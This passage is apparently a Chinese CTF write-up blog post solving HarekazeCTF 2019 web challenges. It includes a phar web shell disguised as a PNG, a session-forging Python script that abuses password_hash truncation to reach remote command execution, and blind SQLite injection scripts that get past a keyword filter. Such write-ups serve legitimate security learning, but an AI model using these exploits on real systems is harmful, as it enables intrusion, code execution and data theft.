<li><p>这样整个 <code>session.php</code> 就完了，回到 <code>index.php</code>，然后进行的是 <code>flash</code> 的判断，找了一下，在 <code>lib\util.php</code> 中描述了 <code>flash</code> 并且给了调用 <code>flash</code> 函数的条件，即 <code>error</code> 函数，找了一下，<code>error</code> 在 <code>upload.php</code> 中，上传失败时调用</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_4.png" alt></p>
</li>
<li><p>做的测试如图，<code>flash</code> 将错误信息保存在 <code>session</code> 中的</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_5.png" alt></p>
</li>
<li><p>根据给的提示，<code>password_hash</code> 函数是存在安全隐患的，它的第一个参数不能超过 72 个字符，这个函数在 <code>sign</code> 中被调用，<code>sign</code> 被 <code>save</code> 调用，<code>save</code> 在 <code>index.php</code> 中被调用</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_6.png" alt></p>
</li>
<li><p><code>password_hash</code> 函数的漏洞就意味着只对前 72 个字符进行签名，只要前 72 个字符相同，那么就会在校验时通过</p>
</li>
<li><p>那么是不是可以登录一次，然后访问 <code>upload.php</code> 触发 <code>error</code> 函数，这样就能绕过 session 校验，然后对 data 信息进行修改，进而触发其他操作</p>
</li>
<li><p>可以看到，在 <code>index.php</code> 中存在一行代码 <code>include($session-&gt;get(&#39;theme&#39;,&#39;light&#39;).&#39;.css&#39;);</code> ，session 信息是由我们控制的，那么就可以通过 phar 协议，触发 LFI ，首先要把 phar 文件上传，里面复合一个假的 css 文件，存放一句话，这样就可以在 <code>include</code> 时触发 RCE</p>
</li>
<li><p>生成 phar 代码</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$png_header = hex2bin(<span class="string">'89504e470d0a1a0a0000000d49484452000000400000004000'</span>);</span><br><span class="line">$phar = <span class="keyword">new</span> Phar(<span class="string">'exp.phar'</span>);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;addFromString(<span class="string">'exp.css'</span>, <span class="string">'&lt;?php system($_GET["cmd"]); ?&gt;'</span>);</span><br><span class="line">$phar-&gt;setStub($png_header . <span class="string">'&lt;?php __HALT_COMPILER(); ?&gt;'</span>);</span><br><span class="line">$phar-&gt;stopBuffering();</span><br></pre></td></tr></table></figure>

<ul>
<li><p>本地对这个 phar 做的一个测试</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_avatar2_7.png" alt></p>
</li>
<li><p>新登录一个用户，上传这个 phar，记录这个 phar 的地址和名字，然后去 <code>upload.php</code> 触发一次 <code>error</code> ，记录 <code>data</code> 和 <code>signature</code> ，修改 <code>data</code> ，增加 <code>theme</code> 键，键值为 phar 协议读取上传的文件，然后生成 session 再去访问 <code>index.php</code> 传入命令即可</p>
</li>
<li><p>exp.py</p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib.parse</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://192.168.233.136:9003/'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">b64decode</span><span class="params">(s)</span>:</span></span><br><span class="line">	<span class="keyword">return</span> base64.urlsafe_b64decode(s + <span class="string">'='</span> * (<span class="number">3</span> - (<span class="number">3</span> + len(s)) % <span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">sess = requests.Session()</span><br><span class="line">username = <span class="string">b"peri0d"</span>.decode()</span><br><span class="line"></span><br><span class="line">url_1 = url + <span class="string">'signin.php'</span></span><br><span class="line">sess.post(url=url_1, data=&#123;<span class="string">'name'</span>: username&#125;)</span><br><span class="line"></span><br><span class="line">url_2 = url + <span class="string">'upload.php'</span></span><br><span class="line">f = open(<span class="string">'exp.phar'</span>, <span class="string">'rb'</span>)</span><br><span class="line">sess.post(url_2, files=&#123;<span class="string">'file'</span>: (<span class="string">'exp.png'</span>, f)&#125;)</span><br><span class="line"></span><br><span class="line">data = sess.cookies[<span class="string">'session'</span>].split(<span class="string">'.'</span>)[<span class="number">0</span>]</span><br><span class="line">data = json.loads(b64decode(data))</span><br><span class="line">avatar = data[<span class="string">'avatar'</span>]</span><br><span class="line"></span><br><span class="line">url_3 = url + <span class="string">'upload.php'</span></span><br><span class="line">sess.get(url_3, allow_redirects=<span class="literal">False</span>)</span><br><span class="line">data, sig = sess.cookies[<span class="string">'session'</span>].split(<span class="string">'.'</span>)</span><br><span class="line">data = b64decode(data)</span><br><span class="line">payload = data.replace(<span class="string">b'&#125;&#125;'</span>, <span class="string">'&#125;&#125;,"theme":"phar://uploads/&#123;&#125;/exp"&#125;&#125;'</span>.format(avatar).encode())</span><br><span class="line">sess.cookies.set(<span class="string">'session'</span>, base64.b64encode(payload).decode().replace(<span class="string">'='</span>, <span class="string">''</span>) + <span class="string">'.'</span> + sig)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">	command = input(<span class="string">'&gt; '</span>)</span><br><span class="line">	c = sess.get(url + <span class="string">'?cmd='</span> + urllib.parse.quote(command)).content.decode()</span><br><span class="line">	result = re.findall(<span class="string">r'/\* light/dark.css \*/(.+)/\*\*/'</span>, c, flags=re.DOTALL)[<span class="number">0</span>]</span><br><span class="line">	print(result.strip())</span><br></pre></td></tr></table></figure>

<h1 id="Sqlite-Voting-350"><a href="#Sqlite-Voting-350" class="headerlink" title="Sqlite Voting [350]"></a>Sqlite Voting [350]</h1><ul>
<li><p>打开靶机，看到投票的页面，并且给了源码</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_vote_1.png" alt></p>
</li>
<li><p>在 <code>vote.php</code> 页面 <code>POST</code> 参数 <code>id</code> ，只能为数字。并且在 <code>schema.sql</code> 中发现了 <code>flag</code> 表</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">DROP TABLE IF EXISTS `vote`;</span><br><span class="line">CREATE TABLE `vote` (</span><br><span class="line">  `id` INTEGER PRIMARY KEY AUTOINCREMENT,</span><br><span class="line">  `name` TEXT NOT NULL,</span><br><span class="line">  `count` INTEGER</span><br><span class="line">);</span><br><span class="line">INSERT INTO `vote` (`name`, `count`) VALUES</span><br><span class="line">  (&apos;dog&apos;, 0),</span><br><span class="line">  (&apos;cat&apos;, 0),</span><br><span class="line">  (&apos;zebra&apos;, 0),</span><br><span class="line">  (&apos;koala&apos;, 0);</span><br><span class="line"></span><br><span class="line">DROP TABLE IF EXISTS `flag`;</span><br><span class="line">CREATE TABLE `flag` (</span><br><span class="line">  `flag` TEXT NOT NULL</span><br><span class="line">);</span><br><span class="line">INSERT INTO `flag` VALUES (&apos;HarekazeCTF&#123;&lt;redacted&gt;&#125;&apos;);</span><br></pre></td></tr></table></figure>

<ul>
<li>在 <code>vote.php</code> 中给出了查询的 SQL 语句，但是对参数进行了检测</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_valid</span><span class="params">($str)</span> </span>&#123;</span><br><span class="line">  $banword = [</span><br><span class="line">    <span class="comment">// dangerous chars</span></span><br><span class="line">    <span class="comment">// " % ' * + / &lt; = &gt; \ _ ` ~ -</span></span><br><span class="line">    <span class="string">"[\"%'*+\\/&lt;=&gt;\\\\_`~-]"</span>,</span><br><span class="line">    <span class="comment">// whitespace chars</span></span><br><span class="line">    <span class="string">'\s'</span>,</span><br><span class="line">    <span class="comment">// dangerous functions</span></span><br><span class="line">    <span class="string">'blob'</span>, <span class="string">'load_extension'</span>, <span class="string">'char'</span>, <span class="string">'unicode'</span>,</span><br><span class="line">    <span class="string">'(in|sub)str'</span>, <span class="string">'[lr]trim'</span>, <span class="string">'like'</span>, <span class="string">'glob'</span>, <span class="string">'match'</span>, <span class="string">'regexp'</span>,</span><br><span class="line">    <span class="string">'in'</span>, <span class="string">'limit'</span>, <span class="string">'order'</span>, <span class="string">'union'</span>, <span class="string">'join'</span></span><br><span class="line">  ];</span><br><span class="line">  $regexp = <span class="string">'/'</span> . implode(<span class="string">'|'</span>, $banword) . <span class="string">'/i'</span>;</span><br><span class="line">  <span class="keyword">if</span> (preg_match($regexp, $str)) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$id = $_POST[<span class="string">'id'</span>];</span><br><span class="line"><span class="keyword">if</span> (!is_valid($id)) &#123;</span><br><span class="line">  <span class="keyword">die</span>(json_encode([<span class="string">'error'</span> =&gt; <span class="string">'Vote id contains dangerous chars'</span>]));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$pdo = <span class="keyword">new</span> PDO(<span class="string">'sqlite:../db/vote.db'</span>);</span><br><span class="line">$res = $pdo-&gt;query(<span class="string">"UPDATE vote SET count = count + 1 WHERE id = $&#123;id&#125;"</span>);</span><br><span class="line"><span class="keyword">if</span> ($res === <span class="keyword">false</span>) &#123;</span><br><span class="line">  <span class="keyword">die</span>(json_encode([<span class="string">'error'</span> =&gt; <span class="string">'An error occurred while updating database'</span>]));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>UPDATE</code> 成功与失败分别对应了不同的页面，那么是不是可以进行盲注，但是考虑到它过滤了 <code>&#39;</code> 和 <code>&quot;</code> 这就无法使用字符进行判断，<code>char</code> 又被过滤也无法使用 ASCII 码判断</p>
</li>
<li><p>所以可以考虑使用 <code>hex</code> 进行字符判断，将所有的的字符串组合用有限的 36 个字符表示</p>
</li>
<li><p>先考虑对 flag 16 进制长度的判断，假设它的长度为 <code>x</code>，<code>y</code> 表示 2 的 n 次方，那么 <code>x&amp;y</code> 就能表现出 <code>x</code> 二进制为 1 的位置，将这些 <code>y</code> 再进行或运算就可以得到完整的 <code>x</code> 的二进制，也就得到了 flag 的长度，而 <code>1&lt;&lt;n</code> 恰可以表示 2 的 n 次方</p>
</li>
<li><p>那么如何构造报错语句呢？在 <code>sqlite3</code> 中，<code>abs</code> 函数有一个整数溢出的报错，如果 <code>abs</code> 的参数是 <code>-9223372036854775808</code> 就会报错，同样如果是正数也会报错</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_vote_3.png" alt></p>
</li>
<li><p>判断长度的 payload : <code>abs(case(length(hex((select(flag)from(flag))))&amp;{1&lt;&lt;n})when(0)then(0)else(0x8000000000000000)end)</code> </p>
</li>
<li><p>脚本如下，长度 84</p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://1aa0d946-f0a0-4c60-a26a-b5ba799227b6.node2.buuoj.cn.wetolink.com:82/vote.php"</span></span><br><span class="line">l = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> n <span class="keyword">in</span> range(<span class="number">16</span>):</span><br><span class="line">	payload = <span class="string">f'abs(case(length(hex((select(flag)from(flag))))&amp;<span class="subst">&#123;<span class="number">1</span>&lt;&lt;n&#125;</span>)when(0)then(0)else(0x8000000000000000)end)'</span></span><br><span class="line">	data = &#123;</span><br><span class="line">		<span class="string">'id'</span> : payload</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	r = requests.post(url=url, data=data)</span><br><span class="line">	print(r.text)</span><br><span class="line">	<span class="keyword">if</span> <span class="string">'occurred'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">		l = l|<span class="number">1</span>&lt;&lt;n</span><br><span class="line"></span><br><span class="line">print(l)</span><br></pre></td></tr></table></figure>

<p>  <img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/buuoj/Harekaze2019_vote_2.png" alt></p>
<ul>
<li><p>然后考虑逐字符进行判断，但是 <code>is_valid()</code> 过滤了大部分截取字符的函数，而且也无法用 ASCII 码判断</p>
</li>
<li><p>这一题对盲注语句的构造很巧妙，首先利用如下语句分别构造出 <code>ABCDEF</code> ，这样十六进制的所有字符都可以使用了，并且使用 <code>trim(0,0)</code> 来表示空字符</p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># hex(b'zebra') = 7A65627261</span></span><br><span class="line"><span class="comment"># 除去 12567 就是 A ，其余同理</span></span><br><span class="line">A = <span class="string">'trim(hex((select(name)from(vote)where(case(id)when(3)then(1)end))),12567)'</span></span><br><span class="line"></span><br><span class="line">C = <span class="string">'trim(hex(typeof(.1)),12567)'</span></span><br><span class="line"></span><br><span class="line">D = <span class="string">'trim(hex(0xffffffffffffffff),123)'</span></span><br><span class="line"></span><br><span class="line">E = <span class="string">'trim(hex(0.1),1230)'</span></span><br><span class="line"></span><br><span class="line">F = <span class="string">'trim(hex((select(name)from(vote)where(case(id)when(1)then(1)end))),467)'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># hex(b'koala') = 6B6F616C61</span></span><br><span class="line"><span class="comment"># 除去 16CF 就是 B</span></span><br><span class="line">B = <span class="string">f'trim(hex((select(name)from(vote)where(case(id)when(4)then(1)end))),16||<span class="subst">&#123;C&#125;</span>||<span class="subst">&#123;F&#125;</span>)'</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>然后逐字符进行爆破，已经知道 flag 格式为 <code>flag{}</code> ，<code>hex(b&#39;flag{&#39;)==666C61677B</code>  ，在其后面逐位添加十六进制字符，构成 paylaod</p>
</li>
<li><p>再利用 <code>replace(length(replace(flag,payload,&#39;&#39;))),84,&#39;&#39;)</code> 这个语句进行判断</p>
</li>
<li><p>如果 flag 不包含 payload ，那么得到的 <code>length</code> 必为 84 ，最外面的 <code>replace</code> 将返回 <code>false</code> ，通过 <code>case when then else</code> 构造 <code>abs</code> 参数为 <code>0</code> ，它不报错</p>
</li>
<li><p>如果 flag 包含 payload ，那么 <code>replace(flag, payload, &#39;&#39;)</code> 将 flag 中的 payload 替换为空，得到的 <code>length</code> 必不为 84 ，最外面的 <code>replace</code> 将返回 <code>true</code> ，通过 <code>case when then else</code> 构造 <code>abs</code> 参数为 <code>0x8000000000000000</code> 令其报错</p>
</li>
<li><p>以上就可以根据报错爆破出 flag，最后附上出题人脚本</p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">URL = <span class="string">'http://1aa0d946-f0a0-4c60-a26a-b5ba799227b6.node2.buuoj.cn.wetolink.com:82/vote.php'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">l = <span class="number">0</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">16</span>):</span><br><span class="line">  r = requests.post(URL, data=&#123;</span><br><span class="line">    <span class="string">'id'</span>: <span class="string">f'abs(case(length(hex((select(flag)from(flag))))&amp;<span class="subst">&#123;<span class="number">1</span>&lt;&lt;j&#125;</span>)when(0)then(0)else(0x8000000000000000)end)'</span></span><br><span class="line">  &#125;)</span><br><span class="line">  <span class="keyword">if</span> <span class="string">b'An error occurred'</span> <span class="keyword">in</span> r.content:</span><br><span class="line">    l |= <span class="number">1</span> &lt;&lt; j</span><br><span class="line">print(<span class="string">'[+] length:'</span>, l)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">table = &#123;&#125;</span><br><span class="line">table[<span class="string">'A'</span>] = <span class="string">'trim(hex((select(name)from(vote)where(case(id)when(3)then(1)end))),12567)'</span></span><br><span class="line">table[<span class="string">'C'</span>] = <span class="string">'trim(hex(typeof(.1)),12567)'</span></span><br><span class="line">table[<span class="string">'D'</span>] = <span class="string">'trim(hex(0xffffffffffffffff),123)'</span></span><br><span class="line">table[<span class="string">'E'</span>] = <span class="string">'trim(hex(0.1),1230)'</span></span><br><span class="line">table[<span class="string">'F'</span>] = <span class="string">'trim(hex((select(name)from(vote)where(case(id)when(1)then(1)end))),467)'</span></span><br><span class="line">table[<span class="string">'B'</span>] = <span class="string">f'trim(hex((select(name)from(vote)where(case(id)when(4)then(1)end))),16||<span class="subst">&#123;table[<span class="string">"C"</span>]&#125;</span>||<span class="subst">&#123;table[<span class="string">"F"</span>]&#125;</span>)'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">res = binascii.hexlify(<span class="string">b'flag&#123;'</span>).decode().upper()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(res), l):</span><br><span class="line">  <span class="keyword">for</span> x <span class="keyword">in</span> <span class="string">'0123456789ABCDEF'</span>:</span><br><span class="line">    t = <span class="string">'||'</span>.join(c <span class="keyword">if</span> c <span class="keyword">in</span> <span class="string">'0123456789'</span> <span class="keyword">else</span> table[c] <span class="keyword">for</span> c <span class="keyword">in</span> res + x)</span><br><span class="line">    r = requests.post(URL, data=&#123;</span><br><span class="line">      <span class="string">'id'</span>: <span class="string">f'abs(case(replace(length(replace(hex((select(flag)from(flag))),<span class="subst">&#123;t&#125;</span>,trim(0,0))),<span class="subst">&#123;l&#125;</span>,trim(0,0)))when(trim(0,0))then(0)else(0x8000000000000000)end)'</span></span><br><span class="line">    &#125;)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">b'An error occurred'</span> <span class="keyword">in</span> r.content:</span><br><span class="line">      res += x</span><br><span class="line">      <span class="keyword">break</span></span><br><span class="line">  print(<span class="string">f'[+] flag (<span class="subst">&#123;i&#125;</span>/<span class="subst">&#123;l&#125;</span>): <span class="subst">&#123;res&#125;</span>'</span>)</span><br><span class="line">  i += <span class="number">1</span></span><br><span class="line">print(<span class="string">'[+] flag:'</span>, binascii.unhexlify(res).decode())</span><br></pre></td></tr></table></figure>

<h1 id="题目总结"><a href="#题目总结" class="headerlink" title="题目总结"></a>题目总结</h1><ol>
<li>json 传输时是 Unicode 编码的，可以使用 Unicode 编码来绕过一个关键词过滤</li>
<li><code>FILEINFO</code> 可以识别 png 图片( 十六进制下 )的第一行，而 <code>getimagesize</code> 不可以</li>
<li>php 默认的 session 反序列化方式是 <code>php</code> ，其存储方式为 <code>键名+竖线+经过serialize函数序列处理的值</code> ，默认保存在 <code>/tmp</code></li>
<li>上传文件存放的位置在 <code>TEMP_DIR</code> ，和 <code>session</code> 信息保存在同一个位置，那么是不是可以考虑伪造 session</li>
<li><code>password_hash</code> 函数只对第一个参数的前 72 个字符有效</li>
<li>phar 是一系列文件的集合，通过 <code>addFromString(filename, file_content)</code> 写入信息，那么通过 <code>phar://test.phar/filename</code> 自然可以读取到，通常文件上传多可以考虑 phar</li>
<li>sqlite3 盲注 bypass ，利用 replace() 和 length 进行爆破，trim() 替换空字符，trim() 和 hex() 构造字符，&amp; 特性获取长度等等，在 mysql 中也存在溢出的现象</li>
</ol>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><ul>
<li><a href="https://www.cnblogs.com/2881064178dinfeng/p/6150645.html" target="_blank" rel="noopener">https://www.cnblogs.com/2881064178dinfeng/p/6150645.html</a></li>
<li><a href="https://www.cnblogs.com/lipcblog/p/7348732.html" target="_blank" rel="noopener">https://www.cnblogs.com/lipcblog/p/7348732.html</a></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/wp/" rel="tag"><i class="fa fa-tag"></i> wp</a>
          
            <a href="/tags/HarekazeCTF/" rel="tag"><i class="fa fa-tag"></i> HarekazeCTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/28/buu SQL注入/" rel="next" title="buuoj的几个SQL注入">
                <i class="fa fa-chevron-left"></i> buuoj的几个SQL注入
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/14/Joomla 3.4.6 RCE 分析/" rel="prev" title="Joomla 3.4.6 RCE 分析">
                Joomla 3.4.6 RCE 分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC80NjMzNS8yMjg0Ng=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/toux.jpg" alt="peri0d">
            
              <p class="site-author-name" itemprop="name">peri0d</p>
              <p class="site-description motion-element" itemprop="description">须知少时凌云志，曾许人间第一流。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">23</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#encode-and-encode-100"><span class="nav-number">1.</span> <span class="nav-text">encode_and_encode [100]</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Avatar-Uploader-1-100"><span class="nav-number">2.</span> <span class="nav-text">Avatar Uploader 1 [100]</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Easy-Notes-200"><span class="nav-number">3.</span> <span class="nav-text">Easy Notes [200]</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Avatar-Uploader-2-300"><span class="nav-number">4.</span> <span class="nav-text">Avatar Uploader 2 [300]</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Sqlite-Voting-350"><span class="nav-number">5.</span> <span class="nav-text">Sqlite Voting [350]</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#题目总结"><span class="nav-number">6.</span> <span class="nav-text">题目总结</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参考链接"><span class="nav-number">7.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">peri0d</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  
